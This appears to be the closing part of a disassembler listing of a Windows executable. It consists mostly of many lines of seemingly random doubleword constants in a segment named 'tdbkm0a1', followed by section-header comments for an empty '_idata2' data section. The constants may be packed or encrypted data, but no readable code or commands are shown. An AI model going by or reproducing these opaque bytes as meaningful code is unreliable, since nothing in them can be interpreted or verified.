dd 0E367D1E4h, 8BF6DC7Bh, 5F82130Ah, 0B38A07C4h, 0D201D51h
dd 4CE1F7E1h, 9E9CCE57h, 6C023CC6h, 0C5E21DCBh, 0BC237404h
dd 701E4CA5h, 0EB7A2074h, 52168A47h, 0C1AF1C85h, 0B7842A99h
dd 64CDEEEFh, 0E8BDCC34h, 967C66BDh, 0D1127AF1h, 732603C4h
dd 0C006B91h, 0E8E72D82h, 0EE592CD7h, 0A75EA6BAh, 0A7CEB4D3h
dd 83A1CAC1h, 0A6341EB2h, 23716FBEh, 82D039D9h, 31327034h
dd 1BE0FB93h, 46EF361Bh, 5D587C78h, 0D7A2921h, 3BC0E9ABh
dd 0DA700EAFh, 726A48B0h, 4CDD8CC9h, 0EBB03791h, 0CBB199C7h
dd 1245A9BDh, 880FC3D6h, 5CDB7EA7h, 4EEBEC7Ah, 28BCAEBh
dd 0A6C4D126h, 3CFB00AFh, 6A6EC2F0h, 0E3D6BD57h, 0E9D6BC21h
dd 0C2A67F99h, 0A82F2B4Ah, 0E626A346h, 5E3DDDBCh, 0B25E5C2Dh
dd 0C060F5F5h, 6D061891h
dd 0FD3C9858h, 0E923468Dh, 3FAC19FCh, 0BE6FE618h, 9A3ABB77h
dd 0A4054F85h, 19FFD323h, 0DDDD74F9h, 0BC78586h, 12EFAFB5h
dd 0A8FBC62Dh, 0F363F136h, 0C6575C1Ch, 0C93AABA3h, 0CDC68D3Ch
dd 4DD394B5h, 244B21ABh, 0EA63B7DEh, 6580828Eh, 946A5607h
dd 74558A45h, 21BD8F96h, 6F9795C8h, 0DB3E73A0h, 10FA8561h
dd 0A707CF40h, 510EAB16h, 61AF912Ch, 0F50A125h, 37496988h
dd 0C61CB164h, 91963B0Ch, 8AB2100Dh, 65920F53h, 21F910D9h
dd 399839D5h, 2290B53Bh, 42CA962Ch, 0E30ED3FEh, 0A41FD4Eh
dd 19F13CA6h, 3FFEF2C5h, 0D7F1B234h, 48AA56D5h, 35757FFCh
dd 70B7862Ch, 0FA4868CAh, 0D9F20797h, 0FC4172Bh, 0BE347A7h
dd 3D8E5DD4h, 0E97700Ch, 0D0EDF78Bh, 0B9F4BB9Fh, 953AD14Fh
dd 8FAEA23Fh, 0A17C7250h, 3E4FE04Fh, 223FEFF0h, 2CF1291Fh
dd 9AA22677h, 8763E2CEh, 5ACF254h, 81FDAD78h, 64D01E36h
dd 91CDFB4Fh, 0ED35A48Bh, 274F7248h, 0C84BD636h, 6ADF2796h
dd 0C239C232h, 8A09B2A7h, 0D8AA3DBh, 8AE6F58h, 0F7780C51h
dd 0FEC58D84h, 581808A7h, 6795B389h, 644DBA15h, 8A4ADF41h
dd 0FA2B4696h, 0CD615E56h, 5F4EA364h, 1700519Dh, 0CBE808B3h
dd 4E95CEA9h, 93059649h, 8279FDFFh, 66A74A7Bh, 5F20577h
dd 521598F9h, 0A3FE0335h, 0EDB5BE03h, 766AE153h, 0AB38466Bh
dd 91AFB162h, 0AE667590h, 18C2E6F0h, 801FEB51h, 11626858h
dd 0A9CA7548h, 0A1A615AAh, 0D6B40E89h, 7D5260DCh, 2BE732h
dd 5FE2FBCBh, 0B0939A0h, 67C1377Ch, 8E0B956Dh, 0B1C8BEAAh
dd 87F4F240h, 8152797Eh, 1A2FC487h, 3BC7712Dh, 14D1F91h
dd 0D4C01DB7h, 96B9C908h, 0DCDA8579h, 0BD8F6003h, 94986A93h
dd 0C4A805A4h, 7F76430Fh, 33BF8D0Fh, 0C85E4532h, 0B81B6ADEh
dd 42485BEBh, 682A1E48h, 12BEE700h, 0D8A739B8h, 1EDB0344h
dd 296E1D76h, 0C456B221h, 83E5AEB5h, 4E23BC8Fh, 6ED03E2Bh
dd 0E4B580B1h, 4136E0E3h, 643115A0h, 0E9CE6819h, 406552D8h
dd 0EDAB3153h, 8F22311Dh, 9A11973Eh, 9475F0Ch, 0B3AE7109h
dd 827BE909h, 2A746EC0h, 8771D038h, 7403CFD8h, 213D0C81h
dd 0F199189Ch, 2D1A9363h, 0F7054A42h, 980F82A5h, 5CB601E4h
dd 0A995221Eh, 0FC36105Ch, 14FFAB3Dh, 0DAECA16Bh, 0A583EEC3h
dd 390B6E38h, 0CDC34E12h, 0A6E0E6BFh, 40545774h, 0BD528CCEh
dd 5C203E4Ah, 638A7F85h, 743248A2h, 0EEC8C91Eh, 2EC3A2A6h
dd 844369CBh, 4769F3DCh, 0F319780Eh, 242E352Eh, 86FAD955h
dd 4B9184EFh, 3B87B704h, 7473D277h, 16EA6458h, 0B07C2E63h
dd 0C62CA441h, 0F4B5E498h, 0D9AAC5B2h, 8EBF6BBh, 0D097248Ah
dd 2040DF8Dh, 6236F45Dh, 49FB355Dh, 0B9287570h, 32633A48h
dd 7805B8DBh, 0C24977A5h, 0F185B32Fh, 0B6E1B65Bh, 301D043Ch
dd 0AF6DA738h, 0B42CFE37h, 5E49D762h, 17A8461h, 0E51D241h
dd 322EC7EDh, 0E2119097h, 9B04586Ah, 4BC17B58h, 2E5CA628h
dd 0F3A4E1FFh, 4C2F7F30h, 6408B10Fh, 5B77BF40h, 0BCAD1669h
dd 0B65041ECh, 2CA7F338h, 0DF25B954h, 0B1733E14h, 0A901371Fh
dd 36947C9Fh, 8B876506h, 0B79156A1h, 3A021388h, 4D46E9D1h
dd 0D52F979Ah, 0A7E08340h, 0BAA350D9h, 9B3CF386h, 817E154Fh
dd 0FBD2D648h, 0BCB8843Ch, 0DA324DDAh, 0BF20F2DBh, 1B0A2C26h
dd 0C74FED63h, 4F0384Ah, 0DA1B0506h, 2C28D432h, 0D8B2982Ah
dd 0C98D7E7Eh, 95468CC5h, 0B40AAFFBh, 0B950484Dh, 0CE6AE1C3h
dd 0AB97920Eh, 0FAFFFDF3h, 0AFED3763h, 0ADE5E22Dh, 0B5A72601h
dd 0ACF19BBh, 0FA218458h, 1C62955Fh, 8E372FE8h, 4F492572h
dd 1EA41D42h, 55BEF59Ch, 35AFB473h, 95BD39FFh, 574D548Ah
dd 979965FEh, 0B1565261h, 522FE45Eh, 0EC58F430h, 9B351812h
dd 9B36B878h, 9AC34F51h, 0F6632CA5h, 0D0044417h, 0F98901EBh
dd 549BCB70h, 88043179h, 9A03B1C8h, 0C3EE8E07h, 0EDF52381h
dd 84168494h, 0C5EA2AA2h, 8DA45508h, 21D4FED5h, 960ADFCFh
dd 0FD69585Dh, 3FD20586h, 104C8D7Fh, 52158280h, 8A69828Bh
dd 0BDAFC8E3h, 0AACD4489h, 1C9EC6Eh, 36F62C6Dh, 571E2CD3h
dd 0FC5D3166h, 0D2F0568Ah, 7A8F8FDDh, 0BADAA8C8h, 3CAB11B0h
dd 3F392758h, 560CBA70h, 1F48A732h, 0D59CBE0Eh, 0EF667E31h
dd 54C4BF0Ch, 2EFDDF03h, 51E3B6Fh, 0FB5359C8h, 0A112A8CBh
dd 36B86C2Ch, 4C24214Ch, 45557E2Ch, 87F754BAh, 6F6AB79Ah
dd 7C8A5706h, 2CB1AC6h, 0E66CDB9h, 0EEF9C2ABh, 0A685756Ah
dd 1BD55203h, 19ECEA40h, 57958BCAh, 0CF6DF57Bh, 11B95465h
dd 3217A75Ch, 9F65339Ah, 0C654C998h, 1318D406h, 360FC6B9h
dd 0FF8D38CEh, 6518F2C2h, 33C46982h, 749E908Fh, 46388204h
dd 6B78BBA5h, 1E5E1FACh, 5D91FAFBh, 8B6CDCB7h, 0FFBDCD8Ah
dd 4535550h, 5A7025Ch, 0DA26FBC2h, 0DC8E885Ch, 6CA44826h
dd 32700C72h, 0D711AEF6h, 0D32A406Ah, 0B9BFD6D4h, 0BBE90CCDh
dd 3CF31374h, 0FDBE8F51h, 895F7F5h, 0B9E73362h, 324B4A0Dh
dd 1DC3545Dh, 0A6A99B44h, 0AF33EFC8h, 553F18C4h, 13020D7Dh
dd 0F37DB5FBh, 0FC5C4891h, 61F42189h, 0ACF8BF4Dh, 0BA0A1B35h
dd 91E3340Eh, 47771D6Fh, 0F489AF3Ah, 0A91C9A7Ah, 2009A5C0h
dd 43E58C8Ah, 5EF6D9EAh, 732B7283h, 0A5EC6D51h, 0F0B9B38Ch
dd 0EF0E72F9h, 0E5609952h, 0AFEFE7CEh, 743E49Bh, 1BDCAEE6h
dd 0F96C7460h, 6298A907h, 8CE7957h, 6F82E102h, 0FA0FF093h
dd 650A1B4Eh, 10667BC6h, 0C4512ADCh, 0E4979198h, 47CF8A5Fh
dd 7EB6CC62h, 70472D26h, 0EEDBE97h, 0FC3F8C3Eh, 8B64DECh
dd 0B25A674Ch, 7E1B7FFh, 8630959h, 4B4B495Ch, 0D4675484h
dd 0C160DD8Bh, 0E0466A6Eh, 59ADA8BAh, 0B0766D6Fh, 8308F780h
dd 0B8CE796Bh, 5758DF6Bh, 0B3574117h, 5C627D27h, 0C63D650Ch
dd 0CB993578h, 480450Bh, 0FF92E00h, 6B6D281Ch, 0A15F1264h
dd 0EF3E7A37h, 69075259h, 0D86C418Ch, 7D01AAD6h, 0AA447774h
dd 1600E79Eh, 0D6D5E3DCh, 0BC564649h, 206692DEh, 3AD39EF0h
dd 0DEB1949Bh, 0DB5C80FBh, 0BEF964F5h, 6EBEDF48h, 0ED3C6EC3h
dd 0A251B62Ch, 0AC40C86Fh, 4543AFEDh, 55370EC2h, 226BD043h
dd 4343EC5h, 0BA5D5158h, 35F676E8h, 3F1B0233h, 95DAC2AAh
dd 85565E1Dh, 1BDE932Ah, 0B861B46Dh, 0D55621CCh, 0B6A8AC93h
dd 0F462FA2h, 2B141881h, 97E26BA0h, 7552F739h, 29E29274h
dd 21265985h, 902F0A80h, 0CE9FAE56h, 0C8607431h, 58E58CC5h
dd 0CECCB2BFh, 0CDBC054Fh, 4E332Fh, 0A1829556h, 4A0C6877h
dd 6713A92h, 0FBC8A63Fh, 0A85A2CCBh, 0F4DBB2E1h, 490BE4E1h
dd 0A9BE0202h, 832AD929h, 6286CE1Ah, 41E48424h, 0DE8DA59Fh
dd 8613B350h, 2BFCACFh, 0D908B409h, 0C0C5520Bh, 41D5A789h
dd 1FF68274h, 0BE42C6E4h, 3CCBF48h, 51874CA6h, 8B93E13Fh
dd 0D952D9C8h, 22A5B5DBh, 6C92DF3Bh, 0DB1CDBDBh, 2BA2AA62h
dd 6AC5E45Ah, 251F62Fh, 9348A7A7h, 4E86F01Bh, 64C010FBh
dd 96F82383h, 0D90D8DD2h, 4130CA40h, 0AB32037Fh, 6BD9D1E3h
dd 0EBEFBED6h, 50966564h, 34F67849h, 0F613E8C6h, 0A1A7525Bh
dd 0D69673F7h, 1BED1FB4h, 4C7D70CFh, 89DAB479h, 0DA693540h
dd 0D29CED87h, 6E82C2E6h, 7CE884EEh, 993DE759h, 0D5E7919Dh
dd 7552C3D6h, 4E274786h, 3FFAFD3Ch, 0BD59BECCh, 0C92D2C2Dh
dd 0C2CB9013h, 0CF935E7Bh, 0F0965C8Ch, 0E5DB0178h, 55695873h
dd 0CFD0FF3Eh, 0D0B5C025h
tdbkm0a1 ends
; Section 9. (virtual address 0008F000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 0008F000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 48F000h
align 2000h
_idata2 ends
end start